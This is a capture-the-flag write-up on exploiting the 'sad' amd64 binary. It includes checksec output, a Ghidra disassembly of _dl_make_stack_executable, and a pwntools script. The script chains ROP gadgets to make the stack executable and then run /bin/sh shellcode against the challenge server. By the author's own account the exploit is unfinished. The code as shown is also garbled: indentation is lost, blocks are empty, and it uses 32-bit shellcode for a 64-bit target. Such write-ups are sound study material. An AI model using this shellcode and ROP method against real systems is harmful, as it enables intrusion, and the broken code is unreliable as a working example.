Tags: pwn rop
# The Tale of the Really SAD binary
Static and Dynamic was an interesting challenge for me. I was able to figure this out; however, I had to try two different methods in order to successfully get it. The method of using syscalls already has a writeup for it. You can [click here](https://ctftime.org/task/12566) to view them. Rather I will show you how I tried to solve this challenge and how I was *almost* successful.
The first thing that I did was run `checksec` on it.
$ checksec sad
[*] '/home/wittsend2/Documents/hacktivitycon-ctf/pwn/sad/sad'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
The weird part to me was that there was a canary. So I tried testing it out by running it.
$ python -c "print('A'*264)"
$ ./sad
This is a really big binary. Hope you have everything you need ;)
Segmentation fault (core dumped)
Hmmm, doesn't actually seems like there was a canary; thus, I will ignore that it was enabled. I also figured out that it took 256 bytes to start to overflow the buffer; thus, I will use that when crafting my exploit.
Lets see if we can reverse this binary and find something interesting. When looking through the binary in Ghidra, I found this function called: `_dl_make_stack_executable`, and my brain thought it hit jackpot.
Let's break down this file and see what we need to do.
ulong _dl_make_stack_executable(ulong *param_1)
int iVar1;
undefined4 extraout_var;
long in_FS_OFFSET;
iVar1 = mprotect((void *)(-_dl_pagesize & *param_1),_dl_pagesize,__stack_prot);
if (iVar1 == 0) {
*param_1 = 0;
_dl_stack_flags = _dl_stack_flags | 1;
return CONCAT44(extraout_var,iVar1);
return (ulong)*(uint *)(in_FS_OFFSET + -0x40);
undefined _dl_make_stack_executable()
undefined AL:1 <RETURN>
_dl_make_stack_executable XREF[4]: Entry Point(*),
004a69b0(*), 004af138(*)
0046c120 f3 0f 1e fa ENDBR64
0046c124 48 8b 35 MOV RSI,qword ptr [_dl_pagesize] = 0000000000001000h
ed 2f 04 00
0046c12b 8b 15 bf MOV EDX,dword ptr [__stack_prot] = 01000000h
1d 04 00
0046c131 53 PUSH RBX
0046c132 48 89 fb MOV RBX,RDI
0046c135 48 89 f7 MOV RDI,RSI
0046c138 48 f7 df NEG RDI
0046c13b 48 23 3b AND RDI,qword ptr [RBX]
0046c13e e8 2d 3b CALL mprotect int mprotect(void * __addr, size
fd ff
0046c143 85 c0 TEST EAX,EAX
0046c145 75 19 JNZ LAB_0046c160
0046c147 48 c7 03 MOV qword ptr [RBX],0x0
00 00 00 00
0046c14e 5b POP RBX
0046c14f 83 0d b2 OR dword ptr [_dl_stack_flags],0x1 = 00000007h
2f 04 00 01
0046c156 c3 RET
0046c157 66 ?? 66h f
0046c158 0f ?? 0Fh
0046c159 1f ?? 1Fh
0046c15a 84 ?? 84h
0046c15b 00 ?? 00h
0046c15c 00 ?? 00h
0046c15d 00 ?? 00h
0046c15e 00 ?? 00h
0046c15f 00 ?? 00h
LAB_0046c160 XREF[1]: 0046c145(j)
0046c160 48 c7 c0 MOV RAX,-0x40
c0 ff ff ff
0046c167 5b POP RBX
0046c168 64 8b 00 MOV EAX,dword ptr FS:[RAX]
0046c16b c3 RET
0046c16c 0f ?? 0Fh
0046c16d 1f ?? 1Fh
0046c16e 40 ?? 40h @
0046c16f 00 ?? 00h
From what we are looking at, it seems that it is awrapper for `mprotect()`. It takes `__stack_prot` as a parameter, which determines whether `NX` is enabled. After doing some research, I realized that the value of `__stack_prot` needed to be `7` so that it can be executable (this is done through a ROP chain). Afterwards, we can jump to the stack with shellcode. Here is what I crafted for the exploit so far. There is a slight issue with it, can you see it?:
from pwn import *
local = True
if local == True:
elf = ELF('./sad')
p = elf.process()
p = remote("jh2i.com", 50002)
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
nops = b'\x90'*(264) #- len(shellcode))
with open("symbols.txt", "w") as f:
rbp = p64(0x402d00)
pop_rsi_ret = p64(0x407aae) #pop rrsi; ret
pop_rax_ret = p64(0x43f8d7) #pop eax; ret
pop_rcx_ret = p64(0x4073e3) #pop rcx; ret
pop_rsp_ret = p64(0x40299b) #pop rsp; ret
pop_rdi_ret = p64(0x403434) #pop rdi ; ret
#mov_rsi_ret = p64(0x46b8a5) #mov qword ptr [rsi] ; rax ; ret
addr_exec_stack = p64(elf.symbols['_dl_make_stack_executable'])
print("_dl_make_stack_executable function location: " + str(addr_exec_stack))
addr_stack_prot = p64(elf.symbols['__stack_prot'])
print("Stack prot variable: " + str(addr_stack_prot))
libc_stack_end = p64(elf.symbols['__libc_stack_end'])
print("Stack end: " + str(libc_stack_end))
payload = nops
payload += pop_rsi_ret
payload += addr_stack_prot
payload += pop_rax_ret
payload += p64(0x7)
# payload += mov_rsi_ret
payload += pop_rdi_ret
payload += libc_stack_end
payload += addr_exec_stack
payload += shellcode
with open("payload.txt", "wb") as f:
#leave_ret = p64(0x401e25)
# print(elf.symbols['puts'])
# payload = shellcode + nops + leave_ret + addr
p.recvuntil("This is a really big binary. Hope you have everything you need ;)")
The issue is that we need an address to `jmp rsp`; however, when using ROPgadget, I was unable to find it. This is the fianl piece to test further whether stack. It is likely that **I might need to make adjustments after finding jmp rsp**; however, I wanted to share the concept of this path to the exploit with everyone. If you have any questions for me, please reach out to me on [The Ragnar Security Twitter](https://twitter.com/ragnarsecurity).